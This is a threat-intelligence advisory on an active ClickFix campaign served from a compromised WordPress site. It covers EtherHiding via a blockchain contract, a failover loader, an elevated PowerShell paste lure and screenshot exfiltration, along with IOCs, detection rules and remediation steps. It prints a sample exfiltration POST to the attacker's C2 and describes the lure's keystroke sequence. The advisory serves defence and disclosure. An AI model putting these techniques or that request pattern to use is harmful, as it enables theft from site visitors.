TLP:CLEAR Active campaign · new C2

WP-002 ClickFix "Variant B" — Elevated Shell, EtherHiding, Screenshot Exfil

Advisory SL-ADV-2026-WP-001 v16 — new lure host, new EtherHiding contract, new C2, and a confirmed screen-capture capability
Author: Dispensight / SecureLeafPublished: 2026-09-24Family: Remus (WP-002)Lure: freightbook365[.]com

Executive summary

A new active instance of the WP-002 / Remus ClickFix chain was captured on a compromised WordPress freight-industry site, freightbook365[.]com. It introduces several changes over the dorz.nl wave (v15): an elevated-shell social-engineering variant (Win+X → PowerShell Admin, Russian-localized), a new EtherHiding contract, a 3-domain failover loader, a new recon/exfil C2 (helauth[.]com), and a previously undocumented screenshot-exfiltration capability.

Delivery of the clipboard poison is TDS-gated / intermittent — a manually captured browser session received only an inert DOM shell (nothing copied), while an instrumented sandbox detonation received the complete, functional chain. Critically, the screenshot/fingerprint reconnaissance fires on every visit regardless of gating, so "inert" sessions are not safe.

1 · Kill chain (reconstructed from decrypted TLS)

Compromised lure — freightbook365[.]com (WordPress)

RevSlider 6.7.16 + js_composer 7.8 (Visual Composer), transcargo theme; 160.153.0.61 (GoDaddy). Victim — splitcam: never blocklisted.

EtherHiding — T1102 · BSC-testnet

Contract 0x5bc946cd5121431c7a43549aee7f567e15176f9c (selector 0xe2179b8e) via data-seed-prebsc-1-s1.binance.org returns base64 JS injecting asseload[.]com/cdn/widget/cdn.js.

Failover loader — cdn.js · T1568

Loads arming stage a4045c662b80.js from asseload[.]com → cfsubs[.]com → helauth[.]com in order. asseload (burned in v15) degraded → failover to cfsubs observed.

Clipboard-arming stage — a4045c662b80.js · T1059.001

XOR/base64 decoder family, new key qEXvNnc5bx0U; contains clipboard-write code (execCommand / clipboard API). Delivery TDS-gated.

Elevated ClickFix action — T1204.004

Win+X → I (PowerShell / Terminal as Admin) → Ctrl+V → Enter. Runs with Administrator rights from the first instruction — an escalation over dorz.nl's non-elevated Win+R. Russian-localized fake Cloudflare Turnstile.

Screenshot recon + exfil — helauth[.]com · T1113

snap.js (html2canvas, 194 KB) captures the visitor screen; base64 JPEG POSTed to /cdn/widget/shot. Beacon /cdn/widget/hit?s=cdn:X&h=<lure>&o=<os>&k=<clip>; poll /cdn/widget/a/done (×334).

2 · What changed vs v15 (dorz.nl)

Elementv15 (dorz.nl)v16 (freightbook365)
ElevationWin+R (non-elevated Run)Win+X → PowerShell (Admin) — elevated
LocaleEnglishRussian
EtherHiding contract0xae5d8eec…080340x5bc946cd…76f9c
Loadersingle asseload aps.js3-domain failover cdn.js (asseload→cfsubs→helauth)
Arming-stage XOR keyoipCQd0DIbeFqEXvNnc5bx0U
C2209.38.82.72:9048 /invoiceshelauth[.]com /hit /shot /a/done
Screenshot exfilnot observedYes — html2canvas → base64 JPEG /shot

3 · Risk assessment (the honest version)

Clipboard poison — intermittent. A manually captured session received an inert DOM shell; nothing was copied. Delivery of the arming stage is TDS-gated, so some visitors are not clipboard-poisoned.
But visitors are not "safe." The sandbox detonation received the full functional chain, and the screenshot + fingerprint recon fires on every visit regardless of gating. Treat the host as actively harmful.
Re-arm is trivial. The DOM shell and failover loader are already in place; the actor only needs any one of three stager domains to serve a working arming stage. "Inert" is reversible at will.
Our own pressure may be degrading it. asseload[.]com — burned in v15 + OTX — is the failed first-choice stager, forcing failover. Plausibly why manual sessions see broken delivery. (Correlation, not proven causation.)

4 · Indicators of compromise

Network

TypeValueRoleHandling
eth-contract0x5bc946cd5121431c7a43549aee7f567e15176f9cEtherHiding (BSC-testnet)track
domainhelauth[.]com (104.21.29.209)recon/exfil C2block
domaincfsubs[.]com (172.67.190.184)failover stagerblock
domainasseload[.]com (104.21.59.52)cdn.js loader (burned)block
urlhxxps://helauth[.]com/cdn/widget/shotscreenshot exfil (POST, base64 JPEG)alert
uri/cdn/widget/hit?s=cdn:X&h=&o=&k=beacon/fingerprintalert
urlhxxp://freightbook365[.]com/compromised lureVICTIM — notify, do not block

Files (SHA-256)

HashArtifact
ba70a75c4b0d81e083fff510d0d6cc0c622cca3660cfa576e34ee899be7f72bccdn.js — failover loader
c5ef6b9f44e97d55d6a0deac0ef22118410c3114e7b5b97f4fc1b5b0c5b4a1e9a4045c662b80.js — clipboard-arming stage (XOR key qEXvNnc5bx0U)
e87e550794322e574a1fda0c1549a3c70dae5a93d9113417a429016838eab8cbsnap.js — html2canvas screenshotter

5 · Detection

Shipped with this advisory: YARA (SL-ADV-2026-WP-001-V16.yar, 5 rules), Sigma (…V16.sigma.yml, 6 rules), STIX 2.1 (…V16.stix.json, 44 objects). Highest-value network discriminator:

POST /cdn/widget/shot?s=cdn:X&h=freightbook365.com HTTP/2
Host: helauth.com
Content-Type: text/plain;charset=UTF-8

/9j/4AAQSkZJRg...        <-- base64 JPEG screenshot of the victim's screen

6 · Recommended actions

PriorityAction
nowBlock helauth[.]com, cfsubs[.]com, asseload[.]com; alert on /cdn/widget/{hit,shot,a/done} and base64-JPEG POST to /shot.
nowHunt elevated PowerShell/Terminal spawned from Win+X (explorer parent, High/System integrity) running download cradles.
soonAlert on injected lure DOM (id="clipboard-text" + checkbox-container) in proxied web responses — catches TDS-gated visits.
coordNotify freightbook365.com owner — compromised WordPress (RevSlider/js_composer). TDS-gated-live, not inert; cleanup required.

Attribution: infrastructure-level only; no named-group assertion. Splitcam: compromised lure/victim hosts are never blocklisted. Provenance: chain reconstructed from an embedded-keylog pcapng by Dispensight/SecureLeaf via independent TLS decryption — EtherHiding, failover, arming stage, C2 and screenshot-exfil all verified on the wire, not from the sandbox report. The final clipboard payload command was not extracted for this advisory.

SL-ADV-2026-WP-001 v16 · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com